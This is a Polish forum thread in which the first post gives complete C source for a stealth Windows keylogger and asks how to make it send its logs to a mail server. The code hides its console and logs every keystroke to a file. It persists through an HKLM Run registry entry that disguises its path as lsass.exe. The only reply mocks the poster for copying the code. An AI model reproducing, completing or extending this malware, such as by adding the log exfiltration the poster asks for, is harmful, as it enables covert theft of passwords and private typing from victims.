Pokaż wyniki 1 do 2 z 2

Temat: problem z keyloggerem

  1. #1
    Zarejestrowany
    Dec 2009
    Postów
    1

    Domyślnie problem z keyloggerem

    Witajcie zrobilem kawalek kodu z keyloggerem i chcialbym wiedziec jakiego kodu wpisac aby wysylal on logi na server poczty i w jakim miejscu go umiescic a o to kod:

    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    #include <windowsx.h>

    #define BUFSIZE 80

    int test_key(void);
    int create_key(char *);
    int get_keys(void);

    int main(void)
    {
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();

    if (test==2) // Create key.
    {
    char *path="C:\\WINDOWS\\system32\\lsass.exe";
    create=create_key(path);

    }


    int t=get_keys();

    return t;
    }

    int get_keys(void)
    {
    short character;
    while(1)
    {
    Sleep(10); // To prevent 100% CPU usage.
    for(character=8;character<=222;character++)
    {
    if(GetAsyncKeyState(character)==-32767)
    {

    FILE *file;
    file=fopen("Kkey.log","a+");
    if(file==NULL)
    {
    return 1;
    }
    if(file!=NULL)
    {
    if((character>=39)&&(character<=64))
    {
    fputc(character,file);
    fclose(file);
    break;
    }
    else if((character>64)&&(character<91))
    {
    character+=32;
    fputc(character,file);
    fclose(file);
    break;
    }
    else
    {
    switch(character)
    {
    case VK_SPACE:
    fputc(' ',file);
    fclose(file);
    break;
    case VK_SHIFT:
    fputs("[SHIFT]",file);
    fclose(file);
    break;
    case VK_RETURN:
    fputs("\n[ENTER]",file);
    fclose(file);
    break;
    case VK_BACK:
    fputs("[BACKSPACE]",file);
    fclose(file);
    break;
    case VK_TAB:
    fputs("[TAB]",file);
    fclose(file);
    break;
    case VK_CONTROL:
    fputs("[CTRL]",file);
    fclose(file);
    break;
    case VK_DELETE:
    fputs("[DEL]",file);
    fclose(file);
    break;
    case VK_OEM_1:
    fputs("[;:]",file);
    fclose(file);
    break;
    case VK_OEM_2:
    fputs("[/?]",file);
    fclose(file);
    break;
    case VK_OEM_3:
    fputs("ö",file);
    fclose(file);
    break;
    case VK_OEM_4:
    fputs("[ [{ ]",file);
    fclose(file);
    break;
    case VK_OEM_5:
    fputs("[\\|]",file);
    fclose(file);
    break;
    case VK_OEM_6:
    fputs("a*",file);
    fclose(file);
    break;
    case VK_OEM_7:
    fputs("ä",file);
    fclose(file);
    break;
    /* case VK_OEM_PLUS:
    fputc('+',file);
    fclose(file);
    break;
    case VK_OEM_COMMA:
    fputc(',',file);
    fclose(file);
    break;
    case VK_OEM_MINUS:
    fputc('-',file);
    fclose(file);
    break;
    case VK_OEM_PERIOD:
    fputc('.',file);
    fclose(file);
    break; */
    case VK_NUMPAD0:
    fputc('0',file);
    fclose(file);
    break;
    case VK_NUMPAD1:
    fputc('1',file);
    fclose(file);
    break;
    case VK_NUMPAD2:
    fputc('2',file);
    fclose(file);
    break;
    case VK_NUMPAD3:
    fputc('3',file);
    fclose(file);
    break;
    case VK_NUMPAD4:
    fputc('4',file);
    fclose(file);
    break;
    case VK_NUMPAD5:
    fputc('5',file);
    fclose(file);
    break;
    case VK_NUMPAD6:
    fputc('6',file);
    fclose(file);
    break;
    case VK_NUMPAD7:
    fputc('7',file);
    fclose(file);
    break;
    case VK_NUMPAD8:
    fputc('8',file);
    fclose(file);
    break;
    case VK_NUMPAD9:
    fputc('9',file);
    fclose(file);
    break;
    case VK_CAPITAL:
    fputs("[CAPS LOCK]",file);
    fclose(file);
    break;
    default:
    fclose(file);
    break;
    }
    }
    }
    }
    }

    }
    return EXIT_SUCCESS;
    }

    int test_key(void)
    {
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QU ERY_VALUE,&hKey);
    if(reg_key!=0)
    {
    check=1;
    return check;
    }

    reg_key=RegQueryValueEx(hKey,"Kkey",NULL,NULL,(LPB YTE)path,&buf_length);

    if((reg_key!=0)||(buf_length>BUFSIZE))
    check=2;
    if(reg_key==0)
    check=0;

    RegCloseKey(hKey);
    return check;
    }

    int create_key(char *path)
    {
    int reg_key,check;

    HKEY hkey;

    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
    if(reg_key==0)
    {
    RegSetValueEx((HKEY)hkey,"Kkey",0,REG_SZ,(BYTE *)path,strlen(path));
    check=0;
    return check;
    }
    if(reg_key!=0)
    check=1;

    return check;
    }

  2. #2
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Witajcie zrobilem kawalek kodu z keyloggerem
    klamiesz. pomijam fakt ze google az sypie identycznym kodem w roznych miejscach. sprawa jest prosta; gdybys to napisal sam, znalbys podstawy -> nie zadawal takich glupich pytan.
    War, war never changes.

Podobne wątki

  1. Strona z Keyloggerem
    By Grzes12 in forum /dev/null
    Odpowiedzi: 0
    Autor: 09-10-2008, 06:05
  2. Problem z keyloggerem
    By okiyama in forum Newbie - dla początkujących!
    Odpowiedzi: 2
    Autor: 05-04-2008, 10:17
  3. Poszukuję trojana z keyloggerem
    By paulgo88 in forum /dev/null
    Odpowiedzi: 1
    Autor: 04-12-2008, 21:25
  4. Pomoc Z Keyloggerem
    By lokid in forum Wirusy/Konie trojańskie
    Odpowiedzi: 2
    Autor: 09-22-2007, 20:21

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52